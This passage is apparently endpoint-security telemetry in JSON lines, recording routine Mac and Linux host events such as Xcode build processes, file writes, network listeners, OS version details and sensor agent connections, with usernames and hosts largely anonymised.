:"ffffffff-1111-11eb-b44e-069a02b0ad6b","PupAdwareConfidence":"0","EffectiveTransmissionClass":"1","aid":"ffffffff45d647e6ae0ba8764a4bd570","MLModelVersion":"4","timestamp":"1625677489052","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CreateProcessArgs","ContextTimeStamp":"1625677524.929","ConfigStateHash":"3090255842","ContextProcessId":"365035560818271291","ContextThreadId":"365035560818271291","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","CommandLine":"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules","Entitlements":"15","name":"CreateProcessArgsMac","id":"ffffffff-1111-11eb-8332-020506b18db5","EffectiveTransmissionClass":"2","aid":"ffffffffb3a3442585c05abc61e290fc","timestamp":"1625677525128","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend"} +{"event_simpleName":"PdfFileWritten","ContextTimeStamp":"1625677488.523","ConfigStateHash":"3090255842","ContextProcessId":"364156540965623394","ContextThreadId":"0","aip":"67.43.156.13","FileIdentifier":"05000001000000000000000000000000f1321d0000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PdfFileWrittenMacV1","id":"ffffffff-1111-11eb-8903-022a1941b91f","EffectiveTransmissionClass":"2","aid":"ffffffffc4044541995bffd84b9df003","timestamp":"1625677488576","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95"} +{"event_simpleName":"GroupIdentity","GID":"242","AuthenticationUuidAsString":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","ConfigStateHash":"3967242894","aip":"67.43.156.13","AuthenticationId":"1119489580471877843","UserPrincipal":"user2@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1485","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GroupIdentityMacV2","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","timestamp":"1625677478379","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"MachOFileWritten","ContextTimeStamp":"1625622611.845","ConfigStateHash":"3967242894","MachOSubType":"3","ContextProcessId":"364938429384226082","Size":"0","ContextThreadId":"0","aip":"67.43.156.13","SHA256HashData":"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198","FileIdentifier":"04000001000000000000000000000000ac41270400000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"MachOFileWrittenMacV3","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677479336","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl"} +{"event_simpleName":"NetworkListenIP6","ContextTimeStamp":"1625622608.014","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP6":"0:0:0:0:0:0:0:0","ConfigStateHash":"3967242894","ConnectionFlags":"0","ContextProcessId":"364938390018585510","RemotePort":"0","aip":"67.43.156.13","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"8770","Entitlements":"15","name":"NetworkListenIP6MacV10","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff44564c2f8d76394cb25c31ab","ConnectionDirection":"2","InContext":"0","timestamp":"1625677478929","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CurrentSystemTags","ConfigStateHash":"3090255842","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","SystemTableIndex":"0","Entitlements":"15","name":"CurrentSystemTagsMacV1","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","EffectiveTransmissionClass":"0","aid":"ffffffff62714a708030d494ca0a7e60","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677502693","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NewExecutableWritten","ContextTimeStamp":"1625677533.027","ConfigStateHash":"1620585913","ContextProcessId":"362208380891022165","Size":"596224","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewExecutableWrittenMacV2","id":"ffffffff-1111-11eb-985c-02152dd35bc1","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677533060","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader","VnodeModificationType":"0"} +{"event_simpleName":"LfoUploadDataComplete","LfoUploadFlags":"4","AttemptNumber":"0","ConfigStateHash":"3090255842","SourceFileName":"/Users/user5/.rbenv/versions/2.6.5/bin/ruby","Size":"3876424","aip":"67.43.156.14","SHA256HashData":"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a","UploadId":"8023668629276690295","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LfoUploadDataCompleteMacV3","id":"ffffffff-1111-11eb-a2ab-024aafff599f","EffectiveTransmissionClass":"2","aid":"fffffffffbea48169985c2c2bae89d1d","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677428827","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LightningLatencyInfo","LightningLatencyState":"3","ConfigStateHash":"3090255842","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LightningLatencyInfoMacV1","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","EffectiveTransmissionClass":"0","aid":"ffffffffd452449b8d1eb7d85b146650","timestamp":"1625677453146","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NeighborListIP4","ConfigStateHash":"1620585913","NeighborList":"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|","aip":"67.43.156.14","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP4MacV1","id":"ffffffff-1111-11eb-9dc0-06c6f5278873","EffectiveTransmissionClass":"3","aid":"ffffffff8eb649cf8d82be1e65629a0e","timestamp":"1625677450083","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ZipFileWritten","ContextTimeStamp":"1625677454.557","ConfigStateHash":"3090255842","ContextProcessId":"365039419134863763","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"07000001000000000000000000000000b1445a0900000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ZipFileWrittenMacV1","id":"ffffffff-1111-11eb-ab6e-0668ec51180b","EffectiveTransmissionClass":"2","aid":"ffffffff2d984e32b702789b54f0f811","timestamp":"1625677454723","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip"} +{"AgentVersion":"6.24.13701.0","aip":"67.43.156.14","ConfigIDBase":"65994753","BiosReleaseDate":"01/06/2021","CpuFeaturesMask":"7494065083858915","ChasisManufacturer":"Apple Inc.","SystemSerialNumber":"C02F649EMD6R","event_platform":"Mac","AgentLoadFlags":"0","CpuVendor":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","BiosVersion":"1554.80.3.0.0 (iBridge: 18.16.14347.0.0,0)","CpuSignature":"591594","EffectiveTransmissionClass":"0","MoboProductName":"Mac-E1008331FDC96864","timestamp":"1625677460451","MicrocodeSignature":"16045690984229358334","event_simpleName":"AgentOnline","ContextTimeStamp":"1625677445.731","SystemProductName":"MacBookPro16,1","MoboManufacturer":"Apple Inc.","ConfigStateHash":"3967242894","ConfigBuild":"1007.4.0013701.1","SystemSku":" ","SensorGroupingTags":"","ConfigurationVersion":"10","AgentLocalTime":"1625677445.731","BiosManufacturer":"Apple Inc.","Entitlements":"15","name":"AgentOnlineMacV13","ConfigIDPlatform":"4","ComputerName":"comp2","ChassisType":"9","ConfigIDBuild":"13701","SystemManufacturer":"Apple Inc.","aid":"ffffffffbea440b9aad8b5bf222d303f","ProvisionState":"1","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"Zero"} +{"event_simpleName":"CriticalFileAccessed","ContextTimeStamp":"1625677438.515","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053399098988534","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileAccessedMacV1","id":"ffffffff-1111-11eb-956a-02748d01bd3d","EffectiveTransmissionClass":"2","aid":"ffffffff8eca418b7a861be9c5f7de1d","timestamp":"1625677438553","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/daemon.plist"} +{"MajorVersion":"19","event_simpleName":"OsVersionInfo","OSVersionFileData":"3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0a3c21444f435459504520706c697374205055424c494320222d2f2f4170706c652f2f44544420504c49535420312e302f2f454e222022687474703a2f2f7777772e6170706c652e636f6d2f445444732f50726f70657274794c6973742d312e302e647464223e0a3c706c6973742076657273696f6e3d22312e30223e0a3c646963743e0a093c6b65793e50726f647563744275696c6456657273696f6e3c2f6b65793e0a093c737472696e673e3139483532343c2f737472696e673e0a093c6b65793e50726f64756374436f707972696768743c2f6b65793e0a093c737472696e673e313938332d32303231204170706c6520496e632e3c2f737472696e673e0a093c6b65793e50726f647563744e616d653c2f6b65793e0a093c737472696e673e4d6163204f5320583c2f737472696e673e0a093c6b65793e50726f647563745573657256697369626c6556657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e50726f6475637456657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e694f53537570706f727456657273696f6e3c2f6b65793e0a093c737472696e673e31332e363c2f737472696e673e0a3c2f646963743e0a3c2f706c6973743e0a","ConfigStateHash":"3967242894","AgentVersion":"6.24.13701.0","aip":"67.43.156.14","MinorVersion":"6","OSVersionString":"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OsVersionInfoMacV3","RFMState":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","OSVersionFileName":"/System/Library/CoreServices/SystemVersion.plist","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677462356","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ConfigBuild":"1007.8.0010912.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1284133626","ConfigStateData":"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-8e88-068a8894a447","aid":"ffffffff4f4044b689d6420d303e4ecd","timestamp":"1625677436454","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"1333055909","aip":"67.43.156.14","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53","DownloadPort":"443","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"LFODownloadConfirmationLinV1","CompletionEventId":"Event_KmaExtDownloadCompleteLinV1","id":"ffffffff-1111-11eb-8dee-0201f64cca29","aid":"ffffffff88b948c6abeeee910f6d8c33","timestamp":"1625677365906","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"KernelModuleArchiveExt11611"} +{"event_simpleName":"TarFileWritten","ContextTimeStamp":"1625677353.633","ConfigStateHash":"3090255842","ContextProcessId":"365049009681176519","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"050000010000000000000000000000005749420100000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"TarFileWrittenMacV1","id":"ffffffff-1111-11eb-9497-028a0bfcf603","EffectiveTransmissionClass":"2","aid":"ffffffffe6244708bd09a6c111f63f4a","timestamp":"1625677353895","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem"} +{"event_simpleName":"AgentConnect","ConfigStateHash":"3967242894","NetworkContainmentState":"0","VerifiedCertificate":"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf","aip":"67.43.156.14","ConfigIDBase":"65994753","FailedConnectCount":"404","ConnectType":"1","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"AgentConnectMacV5","ConfigIDPlatform":"4","PreviousConnectTime":"1625673963.331","id":"ffffffff-1111-11eb-ba54-02a3616f6acd","ConfigIDBuild":"13701","ConnectTime":"1625677350.208","EffectiveTransmissionClass":"2","aid":"ffffffff2977460db2898ece881a9358","ProvisionState":"0","timestamp":"1625677350466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"3090255842","aip":"67.43.156.14","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys","DownloadPort":"443","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LFODownloadConfirmationMacV1","CompletionEventId":"Event_ChannelDataDownloadCompleteMacV1","id":"ffffffff-1111-11eb-8b09-069ee8920171","EffectiveTransmissionClass":"0","aid":"ffffffff5e8b4724aa10088c4f71cd9a","timestamp":"1625677525235","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"C-00000503-00000000-00000001.sys"} +{"event_simpleName":"AsepFileChange","ContextTimeStamp":"1625677482.148","ConfigStateHash":"1620585913","ContextProcessId":"364936256754041721","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"AsepFileChangeMacV1","id":"ffffffff-1111-11eb-9e50-064be6e56df7","EffectiveTransmissionClass":"2","aid":"fffffffff1a64286a233d09974b1b377","timestamp":"1625677482403","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs","VnodeModificationType":"6"} +{"event_simpleName":"TerminateProcess","RawProcessId":"76482","ContextTimeStamp":"1625677510.959","ConfigStateHash":"1284133626","ContextProcessId":"130732827553316","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0010912.1","event_platform":"Lin","TargetProcessId":"130732827553316","Entitlements":"15","name":"TerminateProcessLinV2","id":"ffffffff-1111-11eb-97d0-02b2813216eb","EffectiveTransmissionClass":"2","aid":"ffffffffdd094539a02b394c69a70aaf","timestamp":"1625677511067","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ConfigBuild":"1007.4.0013701.1","event_simpleName":"FirewallEnabled","event_platform":"Mac","ConfigStateHash":"3090255842","Entitlements":"15","name":"FirewallEnabledMacV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-a9e6-067d21325a03","EffectiveTransmissionClass":"2","aid":"ffffffff70cf4070af024397f25007c7","timestamp":"1625677372544","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"FsVolumeUnmounted","VolumeName":"Install Google Drive","ContextTimeStamp":"1625677332.283","ConfigStateHash":"3090255842","aip":"67.43.156.14","VolumeMediaBSDName":"disk2s2","VolumeMountPoint":"/private/tmp/KSInstallAction.dn6J5Xa1M4/m","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"FsVolumeUnmountedMacV1","id":"ffffffff-1111-11eb-8fd9-06866dcbd3d5","EffectiveTransmissionClass":"2","aid":"ffffffffed984e248973f3ada1eb543d","timestamp":"1625677334451","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677474.525","ConfigStateHash":"2300098580","ConnectionFlags":"0","ContextProcessId":"328911864662804336","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"23165","Entitlements":"15","name":"NetworkListenIP4LinV5","id":"ffffffff-1111-11eb-88fd-06a17d0fdc05","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff2a0d484da8f7a9cf8bde7164","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677474879","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ELFFileWritten","ContextTimeStamp":"1625677526.828","ConfigStateHash":"1620585913","ContextProcessId":"363122200934575406","Size":"38798952","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027","FileIdentifier":"040000010000000000000000000000006793f80200000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ELFFileWrittenMacV1","id":"ffffffff-1111-11eb-985c-02152dd35bc1","ELFSubType":"4","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677527114","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe"} +{"MajorVersion":"4","event_simpleName":"OsVersionInfo","OSVersionFileData":"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a","BootArgs":"BOOT_IMAGE\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\u003dUUID\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\u003dtty0 console\u003dttyS0,115200n8 net.ifnames\u003d0 biosdevname\u003d0 nvme_core.io_timeout\u003d4294967295 rd.emergency\u003dpoweroff rd.shell\u003d0","ConfigStateHash":"3712162471","AgentVersion":"6.19.11611.0","aip":"67.43.156.14","MinorVersion":"14","OSVersionString":"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"OsVersionInfoLinV4","RFMState":"1","id":"ffffffff-1111-11eb-93d4-0624c36f3a79","OSVersionFileName":"/etc/os-release","aid":"ffffffff2d1245c0a32d5efcf9351272","timestamp":"1625677383466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CriticalFileModified","ContextTimeStamp":"1625677439.099","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"364849347227309005","ContextThreadId":"0","aip":"67.43.156.13","FileIdentifier":"04000001000000000000000000000000cdf3100100000000","ConfigBuild":"1007.4.0013701.1","UID":"0","USN":"89566685","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileModifiedMacV2","id":"ffffffff-1111-11eb-9262-0268ab613b49","EffectiveTransmissionClass":"2","aid":"ffffffff761b4a7d9962dd9e7e776044","timestamp":"1625677439398","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/user9.plist/"} +{"event_simpleName":"NeighborListIP6","ConfigStateHash":"3090255842","NeighborList":"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|","aip":"67.43.156.14","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP6MacV1","id":"ffffffff-1111-11eb-ac8a-06b5e1186139","EffectiveTransmissionClass":"3","aid":"ffffffff01c7450180352a7c58a28fb4","timestamp":"1625677489786","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677382.785","UserName":"user3","ConfigStateHash":"1325353086","ContextProcessId":"364952259879648742","Size":"8052","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6","FileIdentifier":"04000001000000000000000000000000ef07570000000000","ConfigBuild":"1007.4.0013806.1","event_platform":"Mac","IsOnRemovableDisk":"0","Entitlements":"15","name":"NewScriptWrittenMacV3","id":"ffffffff-1111-11eb-9dc1-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffffcebd42c0890d59b54279d3d3","timestamp":"1625677383057","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh"} +{"event_simpleName":"SystemCapacity","ConfigStateHash":"1620585913","aip":"67.43.156.13","CpuClockSpeed":"2400000000","PhysicalCoreCount":"8","CpuFeaturesMask":"7494065083908067","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LogicalCoreCount":"16","Entitlements":"15","name":"SystemCapacityMacV1","CpuVendor":"0","CpuProcessorName":"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz","id":"ffffffff-1111-11eb-b714-066001392751","CpuSignature":"591597","EffectiveTransmissionClass":"3","aid":"fffffffff2c7432859ff6bbe1a0bd6af","ProcessorPackageCount":"1","MemoryTotal":"17179869184","timestamp":"1625677387216","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 